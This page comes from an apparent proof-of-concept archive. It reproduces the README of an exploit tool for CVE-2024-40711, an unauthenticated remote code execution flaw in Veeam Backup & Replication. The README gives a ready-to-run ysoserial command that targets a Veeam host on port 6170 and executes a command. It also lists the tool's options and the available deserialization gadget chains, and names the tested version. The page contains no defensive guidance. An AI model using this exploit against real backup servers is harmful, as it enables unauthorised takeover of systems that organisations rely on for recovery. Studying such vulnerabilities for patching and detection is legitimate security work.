Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1359 CNY

100%

CVE-2024-40711 PoC — Veeam Backup & Replication 安全漏洞

Source
Associated Vulnerability
Title: Veeam Backup & Replication 安全漏洞 (CVE-2024-40711)
Description:A deserialization of untrusted data vulnerability with a malicious payload can allow an unauthenticated remote code execution (RCE).
Description
CVE-2024-40711-exp
Readme
# Usgaes

```
.\ysoserial.exe -f BinaryFormatter -g Veeam -c {localhostServer} -vi {targetIP} -vp 6170 -vg DataSet -vc "cmd /c mspaint.exe"
```

```
Usage: ysoserial.exe [options]                                                                                                        
Options:                                                                                                                              
      --vi, --targetveeamip=VALUE                                                                                                     
                             The target Veeam Backup and reaplication IP                                                              
                               address                                                                                                
      --vp, --targetveeamport=VALUE                                                                                                   
                             The target Veeam Backup and reaplication port                                                            
                               (default: 6170)                                                                                        
      --vc, --veeamexpcmd=VALUE                                                                                                       
                             The target Veeam Backup and reaplication what                                                            
                               commands will be executed                                                                              
      --vg, --veeamgadget=VALUE                                                                                                       
                             The target Veeam Backup and reaplication what                                                            
                               gadget will be use (default: DataSet)                                                                  
           
```

![cve-2024-4711](./assets/cve-2024-4711.gif)

Other gadget

```
Supported gadgets are: ActivitySurrogateDisableTypeCheck , ActivitySurrogateSelector , ActivitySurrogateSelectorFromFile , AxHostState , BaseActivationFactory , ClaimsIdentity , ClaimsPrincipal , DataSet , DataSetOldBehaviour , DataSetOldBehaviourFromFile , DataSetTypeSpoof , Generic , GenericPrincipal , GetterCompilerResults , GetterSecurityException , GetterSettingsPropertyValue , ObjectDataProvider , ObjRef , PSObject , ResourceSet , RolePrincipal , SessionSecurityToken , SessionViewStateHistoryItem , TextFormattingRunProperties , ToolboxItemContainer , TypeConfuseDelegate , TypeConfuseDelegateMono , Veeam , WindowsClaimsIdentity , WindowsIdentity , WindowsPrincipal , XamlAssemblyLoadFromFile , XamlImageInfo
```

But you must use Gadget to support SOAPFORMATTER
# Test environment
Veeam Backup 12.1.1.56 

# Reference

[watchtowrlabs/CVE-2024-40711: Pre-Auth Exploit for CVE-2024-40711 (github.com)](https://github.com/watchtowrlabs/CVE-2024-40711)

[Veeam Backup & Response - RCE With Auth, But Mostly Without Auth (CVE-2024-40711) (watchtowr.com)](https://labs.watchtowr.com/veeam-backup-response-rce-with-auth-but-mostly-without-auth-cve-2024-40711-2/)

File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →